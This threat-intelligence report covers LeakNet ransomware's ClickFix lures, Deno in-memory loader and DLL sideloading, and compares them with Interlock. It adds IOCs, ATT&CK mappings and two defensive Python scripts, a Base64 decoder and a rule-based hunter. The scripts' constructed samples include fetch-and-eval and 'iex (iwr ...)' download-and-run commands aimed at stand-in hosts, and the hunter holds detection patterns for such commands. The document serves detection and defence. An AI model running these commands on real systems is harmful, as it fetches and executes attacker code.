LeakNet Ransomware Combines ClickFix Social Engineering with Deno In-Memory Loader for Stealthy Attacks
[DATE TO BE UPDATED]
A ransomware operation tracked as LeakNet is using compromised websites to serve ClickFix social engineering lures, then deploying a Deno-based loader that executes malicious JavaScript entirely in memory [1]. The approach is notable for two reasons: it abuses a legitimate runtime (Deno) to avoid detection, and it chains together multiple stages before any ransomware binary ever touches disk. Separate intrusion attempts linked to the same group have also been observed using Microsoft Teams-based phishing to gain initial access [1].
The campaign adds to a growing pattern. CISA published a joint advisory on the Interlock ransomware group using nearly identical ClickFix techniques, including drive-by downloads from compromised legitimate websites and fake CAPTCHA pages [3]. The convergence of tactics across multiple ransomware families signals that ClickFix has moved from a novelty to a standard component of the ransomware playbook.
What Is ClickFix and Why It Works
ClickFix is a social engineering technique that tricks users into copying and pasting malicious commands. Victims land on a compromised website (or a site mimicking a legitimate one) and encounter a fake error or CAPTCHA prompt. The page instructs the user to "fix" the issue by running a command, typically via the Windows Run dialog or PowerShell. The FBI has observed actors obtaining initial access via drive-by downloads from compromised legitimate websites using this exact pattern [3].
The technique exploits user trust and requires minimal technical sophistication: no zero-day or exploit chain is involved, only a convincing prompt and a user willing to paste what it tells them to. ClickFix has been adopted by operators deploying Lumma Stealer, DarkGate, and now both LeakNet and Interlock ransomware [3].
LeakNet's Attack Chain: From Compromised Site to Deno Loader
LeakNet's initial access starts with the ClickFix lure on a compromised website [1]. Once the victim executes the provided command, the attack chain drops PowerShell scripts with filenames following the pattern Romeo*.ps1 and VBScript files following the pattern Juliet*.vbs [1]. These scripts handle the first stage: system fingerprinting and establishing communication with an external server for next-stage malware delivery [1].
The critical differentiator is what comes next. Rather than deploying a custom malware loader that is more likely to get flagged by endpoint detection, the attackers install the legitimate Deno executable [2]. Deno is a modern JavaScript and TypeScript runtime created by the original developer of Node.js. It is a legitimate, widely distributed developer tool, and its execution on its own is not something most EDR products flag by default.
The Deno runtime then executes Base64-encoded JavaScript payloads entirely in memory [1]. This approach sidesteps file-based detection almost completely. The payload fingerprints the system and contacts an external server for the next stage of the attack [1].
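A triage helper for the Base64 layer of such a chain, added here as an example; it is not code from the LeakNet reporting, from Deno, or from any vendor. It unwraps Base64 runs found in a captured command line, distinguishes PowerShell's UTF-16LE -EncodedCommand from plain UTF-8 payloads, recurses through nested encodings, and pulls out URLs for blocking and pivoting. The sample command line, the `.invalid` hostnames and the `svc.exe eval` launch are constructed for this example and say nothing about LeakNet's real invocation, which the cited sources do not publish.

```python
"""Decode Base64 blobs embedded in a captured command line (added example)."""
import base64
import re
from dataclasses import dataclass, field
from typing import List

# A run of 40+ Base64-alphabet characters, optionally padded. Short runs are
# ignored so ordinary words and path components are not decoded.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL = re.compile(r"https?://[^\s'\"<>()]+")
MAX_DEPTH = 3  # layers of Base64-inside-Base64 to unwrap


@dataclass
class Blob:
    depth: int
    encoding: str  # "utf-16le" (PowerShell -EncodedCommand) or "utf-8"
    text: str
    urls: List[str] = field(default_factory=list)


def _to_text(raw: bytes):
    """Return (encoding, text) if raw decodes to printable text, else None."""
    # PowerShell -EncodedCommand is UTF-16LE: for ASCII content every odd byte is 0x00.
    looks_utf16 = len(raw) >= 4 and raw[1::2].count(0) > len(raw) // 4
    enc = "utf-16le" if looks_utf16 else "utf-8"
    try:
        text = raw.decode(enc)
    except UnicodeDecodeError:
        return None
    printable = sum(1 for ch in text if ch.isprintable() or ch in "\r\n\t")
    # Reject binary noise (e.g. a run of 'A's decodes to NUL bytes).
    return (enc, text) if text and printable >= 0.95 * len(text) else None


def decode_blobs(cmdline: str, depth: int = 0) -> List[Blob]:
    """Every decodable Base64 run in cmdline, plus runs nested inside them."""
    blobs = []
    for m in B64_RUN.finditer(cmdline):
        run = m.group(0)
        # Shells and attackers frequently drop '=' padding; restore it.
        padded = run + "=" * (-len(run) % 4)
        try:
            raw = base64.b64decode(padded, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        decoded = _to_text(raw)
        if decoded is None:
            continue
        enc, text = decoded
        blobs.append(Blob(depth, enc, text, URL.findall(text)))
        if depth + 1 < MAX_DEPTH:
            blobs.extend(decode_blobs(text, depth + 1))
    return blobs


def extract_urls(cmdline: str) -> List[str]:
    """Sorted, de-duplicated URLs from every decoded layer."""
    return sorted({u for b in decode_blobs(cmdline) for u in b.urls})


# Constructed sample (not a real LeakNet artifact): a PowerShell -EncodedCommand
# whose script embeds a second, plain Base64 blob of JavaScript handed to a
# renamed runtime. Hostname and invocation are assumptions for the example.
_JS = 'fetch("https://stage2.example.invalid/a.js").then(r => r.text()).then(eval);'
_JS_B64 = base64.b64encode(_JS.encode()).decode()
_PS = (f"$c=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{_JS_B64}'));"
       "& $env:TEMP\\svc.exe eval $c")
SAMPLE_CMDLINE = ("powershell.exe -nop -w hidden -enc "
                  + base64.b64encode(_PS.encode("utf-16le")).decode())

if __name__ == "__main__":
    for b in decode_blobs(SAMPLE_CMDLINE):
        print(f"depth={b.depth} enc={b.encoding} urls={b.urls}\n  {b.text[:80]}")
```

Feed it the CommandLine field from Sysmon Event ID 1 or your EDR's process-creation record; the depth-1 blob is where the second-stage URL usually lives, and it is the value to add to a block list.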
DLL Sideloading and Lateral Movement
BleepingComputer's reporting reveals additional technical detail about LeakNet's post-exploitation behavior. The group uses DLL sideloading via jli.dll, loaded through a Java executable placed in C:\ProgramData\USOShared [2]. The Java launcher resolves jli.dll (the Java Launcher Interface library) relative to its own location, so a copied launcher placed next to an attacker-supplied jli.dll runs the attacker's code inside a legitimate Java process. The path is significant too: USOShared is a legitimate Windows directory associated with the Update Session Orchestrator, making the presence of files there less suspicious to automated monitoring.
For lateral movement, LeakNet relies on PsExec to execute commands across the network [2]. Credential discovery uses klist enumeration to identify Kerberos tickets and map out accessible resources [2]. Data exfiltration flows to Amazon S3, giving the attackers cloud-scale storage for stolen data [2].
Parallel Playbook: Interlock Ransomware's Overlapping Tactics
The concurrent publication of CISA's Interlock advisory (AA25-203A) and the LeakNet reporting reveals significant tactical overlaps [3]. Interlock actors use a nearly identical initial access method: drive-by downloads from compromised sites, with payloads carrying fake browser-update filenames or masquerading as security software [3]. The overlap extends deeper into the kill chain.
Interlock deploys Cobalt Strike and SystemBC for command-and-control, along with custom tools including Interlock RAT and NodeSnake RAT [3]. The group's toolkit includes a credential stealer (cht.exe), a keylogger DLL (klg.dll) that logs keystrokes to conhost.txt, and Berserk Stealer for credential harvesting [3]. Once Interlock actors establish remote control, they use a series of PowerShell commands for further operations [3].
For persistence, Interlock uses a registry entry named Chrome Updater [4]. Remote access relies on AnyDesk and PuTTY [4]. The final ransomware payload is typically named conhost.exe and encrypts data using AES and RSA, appending either .interlock or .1nt3rlock extensions to encrypted files [4].
The data exfiltration methods are particularly aggressive. Interlock uses Azure Storage Explorer to access Azure storage accounts and AzCopy to upload stolen data to Azure storage blobs [3]. WinSCP serves as an additional file transfer tool [3]. Healthcare organizations have been heavily targeted [3].
IOC Table
| Type | Value | Context | Source |
|---|---|---|---|
| Filename | Romeo*.ps1 | PowerShell scripts in LeakNet attack chain | [1] |
| Filename | Juliet*.vbs | VBScript files in LeakNet attack chain | [1] |
| Filename | jli.dll | DLL sideloaded via a Java executable (LeakNet) | [2] |
| Path | C:\ProgramData\USOShared | Directory used for DLL sideloading staging (LeakNet) | [2] |
| Filename | cht.exe | Credential stealer (Interlock) | [3] |
| Filename | klg.dll | Keylogger DLL (Interlock) | [3] |
| Filename | conhost.txt | Keystroke log file (Interlock) | [3] |
| Filename | conhost.exe | Final ransomware payload (Interlock) | [4] |
| Tool | Deno runtime (abused) | Legitimate runtime used as in-memory loader (LeakNet) | [1][2] |
| Malware | Cobalt Strike | C2 framework (Interlock) | [3] |
| Malware | SystemBC | C2 tool (Interlock) | [3] |
| Malware | Interlock RAT | Custom RAT (Interlock) | [3] |
| Malware | NodeSnake RAT | RAT for C2 and command execution (Interlock) | [3] |
| Malware | Berserk Stealer | Credential harvesting tool (Interlock) | [3] |
| Malware | Lumma Stealer | Info stealer deployed via ClickFix | [3] |
| Malware | DarkGate | Malware family using ClickFix | [3] |
MITRE ATT&CK Techniques
| ID | Technique | Relevance |
|---|---|---|
| T1189 | Drive-by Compromise | Compromised websites serving ClickFix lures [1][3] |
| T1204 | User Execution | Victims manually execute pasted commands [1] |
| T1059.001 | PowerShell | Romeo*.ps1 scripts in LeakNet chain [1] |
| T1059.007 | JavaScript | Deno-based in-memory JavaScript execution [1][2] |
| T1574.002 | DLL Side-Loading | jli.dll loaded via Java in USOShared [2] |
| T1021.002 | SMB/Windows Admin Shares | PsExec for lateral movement [2] |
| T1087 | Account Discovery | klist enumeration for Kerberos ticket discovery [2] |
| T1567.002 | Exfiltration to Cloud Storage | S3 exfiltration (LeakNet) [2]; Azure Storage Explorer and AzCopy (Interlock) [3] |
| T1105 | Ingress Tool Transfer | Staging of Deno runtime and payloads [1][2] |
| T1003 | OS Credential Dumping | cht.exe and Berserk Stealer credential theft (Interlock) [3] |
| T1056.001 | Keylogging | klg.dll keylogger writing to conhost.txt (Interlock) [3] |
| T1547.001 | Registry Run Keys / Startup Folder | Chrome Updater registry persistence [4] |
| T1027 | Obfuscated Files or Information | Base64-encoded JavaScript payloads [1] |
| T1486 | Data Encrypted for Impact | AES/RSA encryption of victim files [4] |
Detection and Hunting
Deno Runtime Abuse: Outside software development teams, most enterprise hosts have no legitimate reason to run Deno. Alert on any execution of deno.exe or deno, particularly when it is spawned by PowerShell or another script interpreter. Because a binary can simply be renamed, match on the original file name (Sysmon's OriginalFileName, or the equivalent EDR field) or file hash as well as the process name wherever the telemetry provides it. Splunk query example (field names per the Splunk CIM Endpoint data model; adjust to your sourcetype):
process_name="deno.exe" OR process_name="deno" OR original_file_name="deno.exe"
This should generate very few false positives once developer workstations that legitimately run Deno have been baselined and excluded.
ClickFix Behavioral Indicators: Watch for mshta.exe, powershell.exe, or cmd.exe being launched shortly after browser activity, especially when the parent process is explorer.exe (the parent of anything started from the Run dialog). A command pasted from a browser typically carries a URL, an -EncodedCommand, or an Invoke-Expression (iex) on the command line, so explorer.exe spawning a script host with one of those arguments is a distinctive process tree in Sysmon Event ID 1 or the EDR equivalent.
USOShared Directory Monitoring: The legitimate C:\ProgramData\USOShared directory should not contain Java executables or DLLs like jli.dll. File creation events in this path that aren't from Windows Update components warrant investigation [2].
PsExec and Lateral Movement: Monitor for PsExec service creation events on target hosts (System log Event ID 7045 with the default service name PSEXESVC) and for the PSEXESVC named pipe it creates (Sysmon Event IDs 17 and 18), keeping in mind that the service name can be changed with the -r option. Also watch for klist command-line execution, which indicates Kerberos ticket enumeration [2].
Cloud Exfiltration Indicators: Outbound connections to S3 endpoints (.s3.amazonaws.com) or Azure Blob storage (.blob.core.windows.net) from hosts that don't normally interact with these services are strong indicators of exfiltration [2]. Monitor for AzCopy.exe and Azure Storage Explorer process execution on endpoints where they aren't expected.
Romeo/Juliet Filename Pattern: Hunt for files matching the Romeo*.ps1 and Juliet*.vbs patterns across endpoints [1]. The theatrical naming convention is distinctive enough to serve as a reliable indicator until the operators change it.
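The hunting rules in this section, written as code that can be run over exported process, file and service events and correlated per host. This is an added example, not LeakNet's code, CISA's content or any vendor's detection logic. The Sysmon-like event schema (image, parent, cmdline, original_file_name, target, service_name, image_path), the USOShared writer allowlist, the hostnames and the event timeline are all constructed for the example; the allowlist in particular must be baselined against your own telemetry before use.

```python
"""Hunting rules for the LeakNet/Interlock tradecraft above (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

T0 = datetime(2026, 3, 10, 9, 0, 0)


def ev(minutes, host, kind, **fields):
    """Build one constructed event `minutes` after T0 (field names are assumptions)."""
    return {"ts": T0 + timedelta(minutes=minutes), "host": host, "kind": kind, **fields}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TMP = r"C:\Users\u\AppData\Local\Temp"

# Constructed telemetry. WS01 follows the chain described above; DEV02 is a
# developer running Deno legitimately; SRV01 receives a PsExec service install.
EVENTS = [
    ev(0, "WS01", "process", image=PS, parent=r"C:\Windows\explorer.exe",
       original_file_name="PowerShell.EXE",
       cmdline='powershell -w hidden -c "iex (iwr http://captcha.example.invalid/fix).Content"'),
    ev(1, "WS01", "file", image=PS, target=TMP + r"\Romeo7f.ps1"),
    ev(1, "WS01", "file", image=PS, target=TMP + r"\JulietA1.vbs"),
    # Deno copied under a neutral name: only OriginalFileName still says deno.exe.
    ev(3, "WS01", "process", image=TMP + r"\svc.exe", parent=PS,
       original_file_name="deno.exe", cmdline="svc.exe eval $c"),
    ev(12, "WS01", "file", image=TMP + r"\svc.exe", target=r"C:\ProgramData\USOShared\jli.dll"),
    ev(12, "WS01", "file", image=TMP + r"\svc.exe", target=r"C:\ProgramData\USOShared\javaw.exe"),
    ev(40, "WS01", "process", image=r"C:\Windows\System32\klist.exe",
       parent=r"C:\Windows\System32\cmd.exe", original_file_name="klist.exe", cmdline="klist"),
    ev(45, "SRV01", "service", service_name="PSEXESVC", image_path=r"%SystemRoot%\PSEXESVC.exe"),
    ev(5, "DEV02", "process", image=r"C:\Users\dev\.deno\bin\deno.exe",
       parent=r"C:\Program Files\PowerShell\7\pwsh.exe", original_file_name="deno.exe",
       cmdline="deno run --allow-net main.ts"),
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
CLICKFIX_CMD = re.compile(r"(?i)https?://|\biex\b|invoke-expression|\s-e(nc|ncodedcommand)?\s|mshta")
ROMEO_JULIET = re.compile(r"(?i)^(romeo|juliet)[^\\/]*\.(ps1|vbs)$")
USO_DIR = "c:\\programdata\\usoshared\\"
# Processes expected to write under USOShared: an assumed baseline, not a reference list.
USO_WRITERS = {"mousocoreworker.exe", "usoclient.exe", "svchost.exe", "tiworker.exe"}
HIGH = {"usoshared_binary_drop", "psexec_service_install"}  # escalate even when alone


def base(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_deno(e):
    if e["kind"] == "process" and (base(e["image"]) in {"deno.exe", "deno"}
                                  or e.get("original_file_name", "").lower() == "deno.exe"):
        return "deno_execution"


def rule_clickfix(e):
    if (e["kind"] == "process" and base(e.get("parent", "")) == "explorer.exe"
            and base(e["image"]) in SCRIPT_HOSTS and CLICKFIX_CMD.search(e.get("cmdline", ""))):
        return "clickfix_run_dialog"


def rule_usoshared(e):
    if (e["kind"] == "file" and e["target"].lower().startswith(USO_DIR)
            and base(e["target"]).endswith((".exe", ".dll")) and base(e["image"]) not in USO_WRITERS):
        return "usoshared_binary_drop"


def rule_psexec(e):
    if e["kind"] == "service" and "psexesvc" in (e.get("service_name", "") + e.get("image_path", "")).lower():
        return "psexec_service_install"


def rule_klist(e):
    if e["kind"] == "process" and base(e["image"]) == "klist.exe":
        return "kerberos_ticket_enum"


def rule_romeo_juliet(e):
    if e["kind"] == "file" and ROMEO_JULIET.match(base(e["target"])):
        return "romeo_juliet_script"


RULES = [rule_deno, rule_clickfix, rule_usoshared, rule_psexec, rule_klist, rule_romeo_juliet]


def match_rules(e) -> List[str]:
    return [name for rule in RULES if (name := rule(e))]


def hunt(events, window=timedelta(minutes=60), min_rules=2) -> Dict[str, dict]:
    """Per host: the largest set of distinct rules firing inside one `window`.

    A host is escalated when at least `min_rules` distinct rules fire together
    (the chain, not any single tool) or when one HIGH rule fires on its own.
    """
    hits = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        for name in match_rules(e):
            hits[e["host"]].append((e["ts"], name))
    findings = {}
    for host, host_hits in hits.items():
        best = set()
        for start, _ in host_hits:
            in_window = {n for t, n in host_hits if start <= t <= start + window}
            if len(in_window) > len(best):
                best = in_window
        findings[host] = {"rules": sorted(best), "escalate": len(best) >= min_rules or bool(best & HIGH)}
    return findings


if __name__ == "__main__":
    for host, f in hunt(EVENTS).items():
        print(host, "ESCALATE" if f["escalate"] else "watch", f["rules"])
```

The per-host correlation is the point: a single deno.exe on a developer box stays at "watch", while the same binary renamed to svc.exe on WS01 is caught through OriginalFileName and escalated because it sits in the same hour as the Run-dialog PowerShell, the Romeo/Juliet drops, the USOShared write and the klist run.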
Analysis
LeakNet's use of the Deno runtime represents a broader trend in ransomware operations: living off the land by abusing legitimate, widely used executables. The Deno binary passes reputation checks and will only be stopped by an application control policy that explicitly restricts it, which few organizations outside regulated environments have. Combined with in-memory JavaScript execution, this creates a payload delivery mechanism that many endpoint detection platforms will struggle with.
The convergence between LeakNet and Interlock on ClickFix as an initial access vector is significant. Two distinct ransomware operations independently adopting the same social engineering technique points to ClickFix's effectiveness. This approach is cheaper and more reliable than purchasing zero-day exploits, and it shifts the exploitation target from software to human psychology.
The exfiltration techniques are also maturing. Both groups abuse legitimate cloud infrastructure (S3 for LeakNet, Azure for Interlock) rather than attacker-controlled servers [2]. This makes network-based detection harder because the destination domains are trusted cloud services.
Healthcare continues to absorb disproportionate impact from these operations. The sector's combination of high-value data, operational urgency, and often under-resourced security teams makes it a persistent target.
Red Sheep Assessment
Confidence: Moderate
The tactical overlap between LeakNet and Interlock goes beyond coincidence. Both use ClickFix via compromised legitimate websites, both employ living-off-the-land techniques for post-exploitation, and both exfiltrate to cloud storage. There are two possible explanations. First, the groups share tooling or operational playbooks, possibly through a common affiliate or initial access broker. Second, and more likely, the ransomware ecosystem has reached a point where successful TTPs propagate rapidly across independent groups, much like legitimate software development practices spread through conference talks and blog posts.
LeakNet's choice of Deno is a leading indicator. We assess with moderate confidence that other ransomware operations will likely adopt Deno or similar legitimate runtimes (Bun, for example) within the next quarter. The pattern of abusing signed developer tools for in-memory execution is too effective to stay contained to one group.
The Teams-based phishing vector that LeakNet is also using [1] suggests the group maintains multiple initial access methods simultaneously. This operational flexibility points to either a well-resourced group or strong ties to initial access brokers who can supply diverse entry points.
The distinctive Romeo/Juliet naming convention could indicate either operational indiscipline or deliberate misdirection. We assess with low confidence that these may be dynamically generated filenames where the theatrical prefix serves as a campaign identifier.
Defender's Checklist
- [ ] Block or alert on Deno runtime execution across all endpoints. Query (adjust field names to your data model): process_name="deno.exe" OR process_commandline="*deno run*". Organizations without legitimate Deno usage should implement blocking controls.
- [ ] Monitor C:\ProgramData\USOShared for any non-Windows-Update file creation, particularly executables and DLLs. Deploy a file integrity monitoring rule on this path.
- [ ] Hunt for Romeo*.ps1 and Juliet*.vbs file patterns across all endpoints and file shares using EDR file search capabilities.
- [ ] Audit outbound traffic to S3 (.s3.amazonaws.com) and Azure Blob (.blob.core.windows.net) endpoints. Flag any connections from hosts not on an approved list for cloud storage access.
- [ ] Conduct targeted phishing simulations mimicking ClickFix attacks: create test pages with fake CAPTCHA prompts that log (but don't execute) when users attempt to paste commands. Track metrics and provide immediate corrective training for users who fall for the simulation.
References
[1] https://thehackernews.com/2026/03/leaknet-ransomware-uses-clickfix-via.html
[2] https://www.bleepingcomputer.com/news/security/leaknet-ransomware-uses-clickfix-and-deno-runtime-for-stealthy-attacks/
[3] https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a
[4] https://www.picussecurity.com/resource/blog/cisa-alert-aa25-203a-interlock-ransomware-analysis